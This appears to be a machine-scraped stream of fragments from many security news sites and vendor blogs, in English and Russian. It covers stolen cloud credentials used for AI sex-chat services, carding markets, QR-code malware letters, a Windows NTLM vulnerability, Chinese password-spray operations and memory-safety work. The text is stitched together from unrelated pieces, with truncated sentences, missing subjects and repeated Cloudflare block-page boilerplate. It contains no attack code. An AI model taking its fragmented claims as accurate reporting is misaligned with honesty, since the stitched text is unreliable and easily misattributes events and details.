
Organizations that get relieved of credentials to their cloud environments can quickly find themselves part of a disturbing new trend: Cybercriminals using stolen cloud credentials to operate and resell sexualized AI-powered chat services.

Within minutes, their bait key was scooped up and used to power a service that offers AI-powered sex chats online.

But over the past six months, Ahl said, Bedrock has emerged as one of the top targeted cloud services.

“Bad guy hosts a chat service, and subscribers pay them money,” Ahl said of the business model for commandeering Bedrock access to power sex chat bots.

In June 2024, security experts at Sysdig documented a new attack that leveraged stolen cl…

“Damn my guy actually filed the warrant,” Iza allegedly texted someone after the location warrant was entered.

Iza’s indictment says he also harassed a man identified only as T.W., and refers to T.W.

According to the feds, Iza paid the associate $50,000 to craft the event to his liking, but on the day of the party Iza allegedly told R.C.

balked, Iza allegedly surrounded the man with armed LASD officers, who then extracted the payment by seizing his phone.

The complaint says Iza ran this business with another individual identified only as “T.H.,” and that at some point T.H.

Joker’s Stash also was unique because it claimed to sell only payment cards that its own hackers had stolen directly from merchants.

At the time, card shops typically resold payment cards that were stolen and supplied by many third-party hackers of unknown reliability or reputation.

BRIANS CLUBIn late 2015, a major competitor to Joker’s Stash emerged using UAPS for its back-end payments: BriansClub.

Experts say most of those ATM inflows to Cryptex are bitcoin ATM cash deposits from customers of carding websites like BriansClub and Jokers Stash.

Treasury’s Financial Crimes Enforcement Network (FinCEN) levied sanctions today against PM2BTC under a powerful new “Section 9714” authority include…

In episode 25 of The AI Fix, humanity creates a satellite called Skynet and then loses it, Graham folds proteins in the comfort of his living room, a Florida man gets a robot dog, Grok rats on its own boss, and a podcast host discovers Brazil nuts.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Powered by RedCircleHosts:Graham Cluley:@grahamcluley.com@[email protected]Mark Stockley:@markstockleyEpisode links:Support the show:You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Bluesky, or subscribe for free…

Cybercriminals have adopted a novel trick for infecting devices with malware: sending out physical letters that contain malicious QR codes.

The letters claim that scanning the QR code will install a new severe weather app onto their Android smartphones.

However, according to the NCSC, the QR code's link actually takes Android users to a malicious app called Coper (also known as Octo2) which attempts to steal sensitive credentials from over 380 apps - including banking apps.

The app promoted in the letters mimics a genuine "Alertswiss" weather app used in Switzerland - spelled "AlertSwiss" in the fake version.

The NCSC is asking letter recipients to report it to them online and - obviously -…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Jack Teixeira, the 22-year-old former Air National Guardsman who leaked hundreds of classified documents online, has been sentenced to 15 years in prison.

The leak triggered a major investigation into the state of national security and prompted reforms within the US military to stymie future breaches.

Initially, Teixeira committed classified information he viewed during his working day to memory, and then transcribed it at home to share online.

However, prosecutors described how his activities had later become more brazen, with the IT worker printing hard copies of classified documents on an "isolated and seldom used printer" at the airbase.

The FBI will continue to work diligently with our…

All this and much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Thom Langford.

Smashing Security listeners get $1000 off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Bluesky, Twitter, or join us on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

In episode 24 of The AI Fix, Mark makes an unforgivable error about the Terminator franchise, our hosts wonder if a “seductive” government chatbot will make it easier to talk about tax, a radio station abandons its three month AI experiment after a week, and OpenAI parks its tanks on Google’s lawn.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Powered by RedCircleHosts:Graham Cluley:Mark Stockley:Episode links:Support the show:You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @TheAIFix, subsc…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

SelectBlinds, a popular online retailer of blinds and shades, has disclosed a security breach that has impacted 206,238 of its customers.

For months sensitive payment information was scraped unnoticed from online customers as they filled out the SelectBlinds' checkout page to make their purchases.

SelectBlinds says it has now removed the malware from its website, and is enforcing a password reset for all user accounts.

Affected clients of SelectBlinds would be wise to keep a close eye on their payment card statements to see if there are any unusual transactions.

Credit-card skimming on website checkout pages is not a new threat.

A Facebook friend request leads to arrest, Twitter scams ride again via promoted ads, and adult websites expose their members.

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Smashing Security listeners get $1000 off!

Follow us:Follow the show on Twitter at @SmashinSecurity, or on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

Graham tells Mark a story involving a murder, a moth, and an AI journalist, and Mark pits his co-host against the world’s most advanced computer program in a maths Olympiad.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Powered by RedCircleHosts:Graham Cluley – @gcluleyMark Stockley – @markstockleyEpisode links:Support the show:You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @TheAIFix, subscribe for free in your favourite podcast app such as Apple Podcasts or Spotify, or visit our website f…

According to the criminal complaint against him, Scheuer’s firing from Disney was contentious and not considered to be amicable.

The denial-of-service attack against Disney employees ceased approximately two minutes earlier, just before Scheuer spoke to the agents.

The FBI searched Scheuer's home for evidence, while Scheuer explained that Disney was attempting to frame him.

Coincidentally, or perhaps not, Scheuer had used the same VPN to access his company email from home since at least October 2023.

Fortunately all of the tampered menus were intercepted by Disney before they could be physically distributed to restaurant guests.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Smashing Security listeners get $1000 off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

Graham discovers a robot tongue and ponders the implications of AIs with an appetite, and Mark explains ASCII smuggling — a prompt injection attack that uses completely invisible characters.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

Hosts:Graham Cluley – @gcluleyMark Stockley – @markstockleyEpisode links:Support the show:You can help the podcast by telling your friends and colleagues about “The AI Fix”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @TheAIFix, subscribe for free in your favourite podcast app such as Apple Podcasts or Spotify, or visit our website for …

Рассказываем об обновлении дизайна в менеджере паролей Kaspersky Password Manager для мобильных устройств.

Приобрести лицензию Who Calls можно отдельно или в составе комплексных защитных решений Kaspersky Plus и Kaspersky Premium, предохраняющих не только от телефонных мошенников, но и от множества других угроз.

Устанавливаем Kaspersky Who Calls для AndroidЕсли вы устанавливаете бесплатную версию, выберите по ссылке удобный для вас магазин приложений и скачайте Who Calls.

Если у вас на смартфоне уже были установлены другие приложения Kaspersky — например, Kaspersky Plus или Kaspersky Premium, — Who Calls предложит «Быстрый вход» в используемый вами аккаунт My Kaspersky.

Устанавливаем Kaspersky Who Calls для iOSДля установки бесплатной версии Kaspersky Who Calls для iOS перейдите на страницу прил…

мастер-пароль к нему, а все остальное — от создания до заполнения паролей — будет происходить автоматически.

Важные нюансы: менеджер паролей нужно установить на все свои устройства, чтобы вводить пароли с удобством повсюду.

Данные будут синхронизироваться между всеми вашими устройствами, и, сохранив пароль в смартфоне, вы сможете автоматически подставить его в поле ввода на компьютере, и наоборот.

Дважды проверяйте ссылки и вложенияНе переходите по ссылкам и не открывайте файлы, присланные в мессенджере и по электронной почте, если не знаете, от кого они, и не ждете никаких посланий.

Kaspersky Premium включает в себя менеджер паролей и одноразовых кодов аутентификации, защиту от фишинга и в…

Но при этом уязвимости подвержены все актуальные версии Windows.

Чем опасна уязвимость CVE-2024-43451CVE-2024-43451 позволяет злоумышленнику создать файл, который, попав на компьютер жертвы, позволит атакующему украсть NTLMv2-хеш.

Разумеется, для этого недостаточно одной CVE-2024-43451 — для полноценной атаки ему придется воспользоваться дополнительными уязвимостями, но чужой NTLMv2-хеш изрядно облегчит жизнь атакующего.

На данный момент дополнительных сведений об атаках, в которых CVE-2024-43451 применяется на практике, у нас нет, но в описании уязвимости четко говорится, что уязвимость публична, эксплуатируема и попытки эксплуатации выявлены.

Кроме того, стоит помнить, что большая часть а…

Как сохранить веб-страницу на компьютерПоскольку веб-страница состоит из десятков и сотен файлов, то для ее сохранения придется немного потрудиться.

Чтобы сохранить основное содержимое страницы, но избавиться от меню и баннеров, удобнее отправить ее на печать, использовав в качестве «принтера» опцию «Сохранить как PDF«.

Как сохранить веб-страницу для другихЕсли нужно не просто создать копию страницы для себя, а поделиться ее зафиксированным состоянием с другими людьми, потребуются публичные сервисы архивации.

Как найти удаленный интернет-контент или старую версию сайтаЧтобы посмотреть старую версию любого сайта:откройте web.archive.org;введите полный адрес сайта или конкретной страницы в по…

Серьезные ИБ-инциденты порой затрагивают многих участников, зачастую и тех, кто повседневно не занимается вопросами ИТ и ИБ.

На эти вопросы очень полезно ответить, даже если инцидент не принес существенного ущерба из-за эффективного реагирования или просто удачного стечения обстоятельств.

В первую очередь собрать ответы на вопросы, как и когда противник проник в организацию, какими уязвимостями, техническими и организационными недостатками он воспользовался и как развивалась атака.

Вовлечение высшего руководства в этот процесс особенно полезно — народная мудрость гласит, что никогда бюджеты на ИБ не выделяются так быстро и щедро, как после крупного инцидента.

Важно уточнить, какие стороны н…

Дело в том, что современные аналоги предлагают геймерам не только поиграть, но и заработать NFT-токены.

Но что особенного в этой истории, если мы прекрасно знаем основной инструмент и методы работы злоумышленников?

Киберпреступники заманили жертву на сайт игры и получили полный доступ к ее компьютеру.

Мы в «Лаборатории Касперского» уважаем классику, а потому не смогли устоять перед новыми танчиками.

Сначала мы пытались войти в аккаунты, используя популярные пароли вроде «12345» или «password», но это не сработало.

Как деанонимизируют пользователей TorЕсли вы впервые слышите про Tor и не представляете, как он работает, ознакомьтесь с нашим винтажным материалом.

Операция, приведшая к обнаружению и аресту администратора педофильской платформы, стала возможной в том числе и потому, что в Германии расположено рекордное количество выходных узлов Tor — около 700.

Такая история — не новинка, о проблеме атак по времени давно известно и представителям Tor, и мировым спецслужбам, и ученым.

Зачастую торрент-программы игнорируют настройки прокси и предпочитают прямые соединения — так они деанонимизируют весь трафик, в том числе и Tor.

Зачастую торрент-программы игнорируют настройки прокси и предпочитают прямые со…

Настройки приватности в ASICS Runkeeper, как, впрочем, и в других беговых приложениях, находятся в не вполне очевидном месте.

Вместо этого нажмите на кнопку Я в левом нижнем углу, далее нажмите на шестеренку в правом верхнем углу и на открывшейся странице выберите Настройки приватности.

Также не помешает настроить типы уведомлений, которые вам может присылать ASICS Runkeeper (а вот их в настройках очень много) — для этого вернитесь в Настройки и выберите пункт Push-уведомления.

Это можно сделать в пункте Настройки → Настройки аккаунта → Удалить мои данные.

И не забудьте подписаться на наш блог, чтобы не пропустить другие инструкции и полезные статьи и всегда быть на полкруга впереди мошенни…

Чем раньше действия злоумышленников попадут в сферу внимания защитных решений и экспертов, тем эффективнее получится минимизировать, а то и вовсе предотвратить ущерб.

Например, в нашем майском отчете об эксплойтах и уязвимостях описывается уязвимость CVE-2024-21626, эксплуатация которой позволяет совершить побег из контейнера.

Сделано это было с помощью детектирующих правил R231, R433 и R434, которые уже доступны пользователям KUMA SIEM через систему обновления правил.

С учетом вышеописанного обновления сейчас на платформе доступно более 659 правил, из них 525 правил с непосредственно детектирующей логикой.

О других доработках нашей SIEM системы вы сможете прочитать в будущих постах.

Более того, свежий документ, прошедший четыре раунда публичных правок с индустриальными экспертами, отражает современный взгляд на процессы идентификации и аутентификации, включая требования к безопасности и конфиденциальности, и с учетом возможного распределенного (федеративного) подхода к этим процессам.

Стандарт практичен и учитывает человеческий фактор — то, как пользователи реагируют на те или иные требования к аутентификации.

В новой редакции стандарта формализованы понятия и описаны требования к:passkeys (в стандарте названы syncable authenticators);аутентификации, устойчивой к фишингу;пользовательским хранилищам паролей и доступов — кошелькам (attribute bundles);регулярной реаутенти…

А по статистике*, в развитых странах подписчики тратят в год на подписки сумму, сопоставимую со среднемесячным заработком.

Дело в том, что средняя стоимость одной подписки в США, Германии и Великобритании ($12 в месяц) аж в три раза выше средней стоимости подписки в России ($4).

На разных устройствах у одного и того же сервиса оказываются разные учетные записи, и за каждую из них приходится платить.

Если ничего не находится, поможет поиск Google по сайту — только убедитесь, что покупаете официальное ПО на официальном сайте, а не вредоносное ПО на сайте-фальшивке.

Оно отслеживает различные спецпредложения и промокоды, и с его помощью можно ощутимо сэкономить на продлении подписки.

В случае IT-специалистов таким подходом часто может стать предложение хорошо оплачиваемой работы в престижной компании.

Хакеры уже несколько лет активно используют фейковые вакансии для охоты на IT-специалистов — и в ряде случаев добиваются поистине оглушительного успеха.

В другом сценарии злоумышленники под видом рекрутеров также инициируют общение с жертвой в LinkedIn, но далее плавно переводят беседу в WhatsApp.

Однако, в отличие от предыдущих вариаций схемы, вместо того чтобы напрямую прислать файл, разработчика отправляют за ним в репозиторий на GitHub.

Как и в других вариациях этой схемы, расчет злоумышленников состоит в том, что жертва проходит «собеседование» на рабочем компьютере и…

Группа исследователей безопасности обнаружила серьезную уязвимость в веб-портале, принадлежащем южнокорейскому автопроизводителю Kia, которая позволяла удаленно взламывать автомобили и следить за их владельцами.

Слишком подключенные автомобилиНе все об этом задумываются, но автомобили за последние пару десятилетий превратили в очень большие компьютеры на колесах.

Таким образом атакующему становились доступны такие функции, которые по-хорошему и автодилерам иметь не стоило бы — по крайней мере после того, как автомобиль был передан покупателю.

Исследователи ответственно подошли к раскрытию информации об уязвимости: они сообщили автопроизводителю о найденной проблеме и опубликовали свою работ…

While there are many benefits of help desk tickets, there are also hidden costs.

How to reduce help desk ticketsOne way to reduce help desk tickets is to implement technology solutions that make access easy for end users.

And by improving the user experience for remote access, this proactively reduces the creation of help desk tickets.

Impact of User Protection Suite toolsCustomers who are using Cisco’s User Protection Suite tools have seen the positive impact of reducing help desk tickets, and the burden on the IT team.

Overall, help desk tickets are an important tool to enable organizations to operate.

Here’s how to ensure your microsegmentation project is a success, without getting lost in the technical details.

Microsegmentation is a long-term investment in your organization’s security, providing not only protecting today but also adaptability for tomorrow’s challenges.

Gathering the ingredients: Preparation is keyA successful microsegmentation project requires more than just your IT or security department — it needs a cross-functional team.

For this initiative to truly work, the project team must include voices from across the organization: IT, security, application owners, key business leaders and project sponsors.

This knowledge, held by teams across the business, is critical to a su…

Cisco is excited to share that Robust Intelligence, a recently acquired AI security startup, has been mentioned in the first ever 2024 Gartner Cool Vendors for AI Security report.

The responsibility of AI security is shared by those developing AI applications and the security and governance teams protecting sensitive data at an organizational level.

As a pioneer in this space, Robust Intelligence introduced the first-ever AI Firewall to the market as part of their comprehensive AI security platform.

Robust Intelligence continues to be at the forefront of AI security innovation, from creating the industry’s first AI Firewall to conducting breakthrough AI research.

Gartner, Cool Vendors for A…

Cisco Secure Firewall is an exceptionally robust firewall solution with innovative features such as Snort IPS, URL filtering, and malware defense.

However, organizations can overcome these challenges by leveraging a secure firewall solution for simplified and secure branch deployment.

The management center integrates with the Cisco Security Cloud and Cisco Defense Orchestrator (CDO) for this functionality.

More details about the templates could be found here: Zero touch provisioning with Cisco Firewall Management Center Templates – Cisco Blogs.

Cisco Security Social ChannelsInstagramFacebookTwitterLinkedInShareShare:

In this part, we cover leveraging public Cisco Talos blogs and third-party threat intelligence data with Cisco Secure Network Analytics.

Cisco Talos BlogsThe talented researchers at Cisco Talos regularly publish blogs on threats and vulnerabilities.

We can use these blogs and GitHub files to build Custom Security Events in Cisco Secure Network Analytics.

They work the same way we handled internal threat intelligence in the first part of this blog or Cisco Talos blogs shown above.

Host group parent/child relationshipsA good practice for building parent and child host groups is to create a new parent host group for any distinct sources.

The NetSecOPEN report confirms the advanced security capabilities of Cisco Secure Firewall, with 98% threat efficacy, 100% detection for evasive threats, and 100% block rate under heavy load conditions.

In testing, with its cutting-edge FPGA design, Cisco Secure Firewall 3105 maintained an impressive 4.17 Gbps throughput.

With Cisco Secure Firewall, businesses can confidently enable advanced security features without compromising speed.

Cisco Secure Firewall empowers you to face the future without trade-offs, offering seamless protection today and tomorrow.

We have verified what Cisco Secure Firewall has steadily offered: industry-leading protection with effective speed while closing securi…

The Middle East region is quickly emerging as a new, dynamic player in the world of cybersecurity regulations.

State of QatarThe State of Qatar’s cybersecurity regulatory framework consists of legislations, international standards and strategy guidelines placed within various cybersecurity frameworks, introduced across different strategic and business sectors.

It also includes strategies focused on setting up a collaborative environment aimed at building and cultivating national cybersecurity capabilities.

As part of the National Cybersecurity Strategy (NCS), the National Cybersecurity Authority (NCA) was established in 2017 to regulate and improve the cybersecurity landscape in the KSA wit…

For the past six years, Cisco has been studying consumer sentiment across the privacy landscape and the evolution of privacy from a compliance matter to a consumer requirement.

Growing regulatory awareness fosters consumer confidenceThere are now more than 160 countries with national or multinational privacy laws in place.

With the strong correlation between regulatory awareness and consumer confidence, transparency can be a differentiator when it comes to customer trust.

Transparency as a driver of trust in the AI eraThis consumer awareness coincides with the rapid advancement of Generative AI (Gen AI).

Explore these trends and more in the Cisco 2024 Consumer Privacy Survey.

Discover key insights from the SOC Findings Report at RSA Conference 2024, co-released by Cisco and NetWitness for Cybersecurity Awareness Month.

Security software can be the first line of defense or the last, and the cost of failure is catastrophic. That's why quality is priority zero for Cisco.

Built-in security: QUIC integrates Transport Layer Security (TLS) to provide encrypted connections by default, improving both privacy and security.

Reimagining Zero Trust: Powering a secure, in-office experience, for an anywhere workplaceZero Trust Access by Cisco is available easily via our User Protection Suite licensing, which includes Cisco Secure Access.

With the industry-leading technologies outlined in this blog post and an identity-first approach, Cisco Zero Trust Access (and Cisco Secure Access) provides an easy-to-manage and deploy SSE platform.

Discover more about Cisco Zero Trust Access, and how it can transform your security approach, by registering for an upcoming workshop or …

After a rigorous evaluation of 10 firewall solution vendors, Cisco was named a Leader in The Forrester Wave™: Enterprise Firewall Solutions, Q4 2024 report.

Reading the report, Forrester noted the following in Cisco’s vendor profile that we are particularly proud of.

Cisco: The only Enterprise Firewall Solutions leader to also be named a leader in The Forrester Wave™: Microsegmentation Solutions, Q3 2024While we are incredibly excited to be named a Leader in Enterprise Firewall Solutions, we are equally ecstatic about what we feel this says about how we are addressing segmentation holistically.

Or, learn more about Cisco’s firewall and other security solutions.

Cisco Security Social Channel…

Enter Gatekeeper — a powerful tool designed to manage and implement policies across your EKS clusters, making cross-functional collaboration secure and efficient.

Policy as Code: With Gatekeeper, policies are managed as code, making them version-controlled and auditable.

Using Kubernetes namespaces and Gatekeeper policies, each BU can operate independently within its environment, all while sharing the same EKS infrastructure.

Restricted Access : Gatekeeper policies restrict access between namespaces.

Gatekeeper Policy Enforcement: Gatekeeper policies enforce access control and ensure that operations are restricted to the appropriate namespace.

84% of surveyed organizations want to feel more confident about managing and discovering data input into AI apps and tools.

The post Microsoft Data Security Index annual report highlights evolving generative AI security needs appeared first on Microsoft Security Blog.

As part of the department’s ongoing assessments of zero trust implementation, Flank Speed just underwent its second round of security assessments sponsored by the DoD Zero Trust Portfolio Management Office (PfMO)—with tremendous results.

DoD Zero Trust Report The United States Navy is proving that Zero Trust goes beyond compliance standards and has become a proven security methodology with real world results.

The DoD expanded beyond traditional penetration testing to thoroughly evaluate all 152 zero trust activities.

This comprehensive and extensible zero trust platform supports a range of environments including hybrid cloud, multicloud, and multiplatform needs.

Also, follow us on LinkedIn …

To maximize the advantages of generative AI, we need to strike a balance between addressing the potential risks and embracing innovation.

In our recent strategy paper, “Minimize Risk and Reap the Benefits of AI,” we provide a comprehensive guide to navigating the challenges and opportunities of using generative AI.

We offer best practices for aligning AI initiatives with legal and ethical standards, including establishing ethics committees and leveraging frameworks like the NIST AI Risk Management Framework.

Explore concrete actions for the futureAs your organization adopts generative AI, it’s critical to implement responsible AI principles—including fairness, reliability, safety, privacy, …

Zero Trust Workshop A comprehensive technical guide to help customers and partners adopt a Zero Trust strategy and deploy security solutions end-to-end to secure their organizations.

The Zero Trust Workshop is a great starting point for our customers who want to embrace Zero Trust principles, but don’t know how to align the technology they already own.

The Zero Trust Strategy workshop: This is a guided breakdown of the Zero Trust areas according to the standard Zero Trust pillars (Identity, Devices, Data, Network, Infrastructure and Application, and Security Operations).

I invite you to check out the Zero Trust Workshop site where we have detailed training videos and content.

Additional res…

Unique characteristics of QR code phishing campaignsSecurity 101: What is phishing?

Learn moreLike with other phishing techniques, the goal of QR code phishing attacks is to get the user to click on a malicious link that seems legitimate.

The necessity of innovation in QR code phishing defenseInnovation in the face of evolving QR code phishing risk is not just beneficial, it’s imperative.

In response to the growing threat of QR code phishing, Microsoft Defender for Office 365 took decisive action to leverage advanced machine learning and AI—developing robust defenses capable of detecting and neutralizing QR code phishing attacks in real time.

QR code phishing blocked by Microsoft Defender f…

Microsoft assesses that credentials acquired from CovertNetwork-1658 password spray operations are used by multiple Chinese threat actors.

Microsoft assesses that multiple Chinese threat actors use the credentials acquired from CovertNetwork-1658 password spray operations to perform computer network exploitation (CNE) activities.

Steps taken to prepare the router for password spray operationsCovertNetwork-1658 is observed conducting their password spray campaigns through this proxy network to ensure the password spray attempts originate from the compromised devices.

Password spray activity from CovertNetwork-1658 infrastructureMicrosoft has observed multiple password spray campaigns origina…

Microsoft is positioned in the Leaders Category in the 2024 IDC MarketScape for worldwide SIEM for Enterprise—making it the third major analyst report in SIEM to name Microsoft as a Leader. The post ​​Microsoft now a Leader in three major analyst reports for SIEM appeared first on Microsoft Security Blog.

An invalid set of parameters has been specified in the url.

As October draws to a close, marking 21 years of Cybersecurity Awareness Month, cyberattacks continue to be a challenge for businesses of all sizes, however, small and medium businesses (SMBs) face distinct challenges when it comes to cybersecurity.

Microsoft, in collaborating with the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCA), has outlined four simple best practices to creates a strong cybersecurity foundation.

These assessments can help SMBs uncover areas open to attack to minimize them, ensure compliance with regulatory requirements, establish incident response plans, and more.

94% consider cybersecurity critical to their busine…

The way to win is with AI-first, end-to-end security—a key focus for Microsoft Security at Microsoft Ignite, November 18 to 22, 2024.

And be sure to register for the digital experience to explore the Microsoft Security sessions at Microsoft Ignite.

If you’re already attending in person, log in to your Microsoft Ignite registration and add on the Microsoft Security Ignite Forum.

If you’re already attending in person, log in to your Microsoft Ignite registration and add on the Microsoft Security Ignite Forum.

Plus, you can take your security knowledge further at Tech Community Live: Microsoft Security edition on December 3, 2024, to ask all your follow-up questions from Microsoft Ignite.

Since October 22, 2024, Microsoft Threat Intelligence has observed Russian threat actor Midnight Blizzard sending a series of highly targeted spear-phishing emails to individuals in government, academia, defense, non-governmental organizations, and other sectors. This activity is ongoing, and Microsoft will continue to investigate and provide updates as available. Based on our investigation of previous Midnight […]

The post Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files appeared first on Microsoft Security Blog.

Healthcare organizations are an attractive target for ransomware attacks. Read our latest blog post to learn why and get strategies to protect yourself from cyberthreats.​ The post Microsoft Threat Intelligence healthcare ransomware report highlights need for collective industry action appeared first on Microsoft Security Blog.

The most important part that usually requires TCC camera access is:Figure 3.

Note how TCC access for Camera is not permitted, as well as Safari-specific controls do not automatically allow Camera access:Figure 5.

Google Chrome first asking TCC access to the microphone via a “true” TCC popup that works at the app level.

ReferencesJonathan Bar OrMicrosoft Threat IntelligenceLearn moreFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threa…

Specifically:Russian threat actors appear to have outsourced some of their cyberespionage operations to criminal groups, especially operations targeting Ukraine.

Iranian nation-state actors used ransomware in a cyber-enabled influence operation, marketing stolen Israeli dating website data.

We believe these domains are examples both of cybercriminal activity driven by profit and of reconnaissance by nation-state threat actors in pursuit of political goals.

Financially motivated cybercrime and fraud remain a persistent threatWhile nation-state attacks continue to be a concern, so are financially motivated cyberattacks.

However, those norms so far lack meaningful consequence for their violati…

Based on an analysis of in-the-wild exploits tracked by Google's Project Zero, spatial safety vulnerabilities represent 40% of in-the-wild memory safety exploits over the past decade:Breakdown of memory safety CVEs exploited in the wild by vulnerability classGoogle is taking a comprehensive approach to memory safety.

This leads to an exponential decline in memory safety vulnerabilities and quickly improves the overall security posture of a codebase, as demonstrated by our post about Android's journey to memory safety.

We’ve begun by enabling hardened libc++, which adds bounds checking to standard C++ data structures, eliminating a significant class of spatial safety bugs.

This improves spat…

That’s why we’re using the best of Google AI to identify and stop scams before they can do harm with Scam Detection.

Scam Detection is off by default, and you can decide whether you want to activate it for future calls.

Scam Detection is off by default, and you can decide whether you want to activate it for future calls.

Cutting-edge AI protection, now on more Pixel phones: Gemini Nano, our advanced on-device AI model, powers Scam Detection on Pixel 9 series devices.

We look forward to learning from this beta and your feedback, and we’ll share more about Scam Detection in the months ahead.

Every day, over a billion people use Google Messages to communicate.

That’s why we’ve made security a top priority, building in powerful on-device, AI-powered filters and advanced security that protects users from 2 billion suspicious messages a month.

With end-to-end encrypted1 RCS conversations, you can communicate privately with other Google Messages RCS users.

We're committed to constantly developing new controls and features to make your conversations on Google Messages even more secure and private.

As part of cybersecurity awareness month, we're sharing five new protections to help keep you safe while using Google Messages on Android:

Our internal analysis estimates that 75% of CVEs used in zero-day exploits are memory safety vulnerabilities.

Our Secure by Design commitment emphasizes integrating security considerations, including robust memory safety practices, throughout the entire software development lifecycle.

This post builds upon our previously reported Perspective on Memory Safety, and introduces our strategic approach to memory safety.

By open-sourcing these tools, we've empowered developers worldwide to reduce the likelihood of memory safety vulnerabilities in C and C++ codebases.

Migration to Memory-Safe Languages (MSLs)The first pillar of our strategy is centered on further increasing the adoption of memory-s…

Situations like Janine’s highlighted the need for a comprehensive solution to phone theft that exceeded existing tools on any platform.

These advanced theft protection features are now available to users around the world through Android 15 and a Google Play Services update (Android 10+ devices).

These theft protection features are just one example of how Android is working to provide real-world protection for everyone.

You can turn on the new Android theft features by clicking here on a supported Android device.

Learn more about our theft protection features by visiting our help center.

If only the whole tree of Chrome UI controls were exposed, somehow, such that we could enumerate and interact with each UI control automatically.

We need to amortize that cost over thousands of test cases by running a batch of them within each browser invocation.

Yet this is tricky, since Chrome UI controls are deeply nested and often anonymous.

This approach has proven to be about 80% as quick as the original ordinal-based mutator, while providing stable test cases.

If you’d like to follow along, keep an eye on our coverage dashboard as it expands to cover UI code.

Most smartphones use cellular baseband processors with tight performance constraints, making security hardening difficult.

The Cellular BasebandThe cellular baseband within a smartphone is responsible for managing the device's connectivity to cellular networks.

The firmware within the cellular baseband, similar to any software, is susceptible to bugs and errors.

For example, 0-day exploits in the cellular baseband are being used to deploy the Predator malware in smartphones.

Pixel's proactive approach to security demonstrates a commitment to protecting its users across the entire software stack.

The Chrome Security Team is constantly striving to make it safer to browse the web.

We invest in mechanisms to make classes of security bugs impossible, mitigations that make it more difficult to exploit a security bug, and sandboxing to reduce the capability exposed by an isolated security issue.

Historically the Chrome Security Team has made major investments and driven the web to be safer.

In the longer-term the Chrome Security Team advocates for operating system improvements like less-capable lightweight processes, less-privileged GPU and NPU containers, improved application isolation, and support for hardware-based isolation, memory safety and flow control enforcement.

Good Bugs and Ba…

Memory safety vulnerabilities remain a pervasive threat to software security.

We’ll also share updated data on how the percentage of memory safety vulnerabilities in Android dropped from 76% to 24% over 6 years as development shifted to memory safe languages.

This decision was driven by the increasing cost and complexity of managing memory safety vulnerabilities.

We first reported this decline in 2022, and we continue to see the total number of memory safety vulnerabilities dropping3.

As the number of memory safety vulnerabilities have dropped, the overall security risk has dropped along with it.

Arm Product Security and GPU TeamsArm has a central product security team that sets the policy and practice across the company.

Working together to secure Android devicesGoogle’s Android Security teams and Arm have been working together for a long time.

So “application ⇒ kernel ⇒ firmware ⇒ kernel” is a known attack flow in this area.

The Arm Product Security Team is actively involved in security-focused industry communities and collaborates closely with its ecosystem partners.

The Android Red Team and Arm continue to work together to proactively raise the bar on GPU security.

We previously posted about experimenting with a hybrid post-quantum key exchange, and enabling it for 100% of Chrome Desktop clients.

The hybrid key exchange used both the pre-quantum X25519 algorithm, and the new post-quantum algorithm Kyber.

As a result, the codepoint in TLS for hybrid post-quantum key exchange is changing from 0x6399 for Kyber768+X25519, to 0x11EC for ML-KEM768+X25519.

Post-quantum cryptography is too big to be able to offer two post-quantum key share predictions at the same time.

Longer term, we hope to avoid the chicken-and-egg problem for post-quantum key share predictions through our emerging IETF draft for key share prediction.

The Android team has discussed Rust for bare-metal firmware previously, and has developed training specifically for this domain.

The shim serves as a wrapper around the Rust library API, bridging the existing C API and the Rust API.

Choosing a Pre-Existing Crate (Rust Library)Picking the right open-source crate (Rust library) to replace the chosen component is crucial.

[no_std]#[cfg(feature = "std")] extern crate std; extern crate alloc;Then, iteratively fix all occurring compiler errors as follows:Move any use directives from std to either core or alloc.

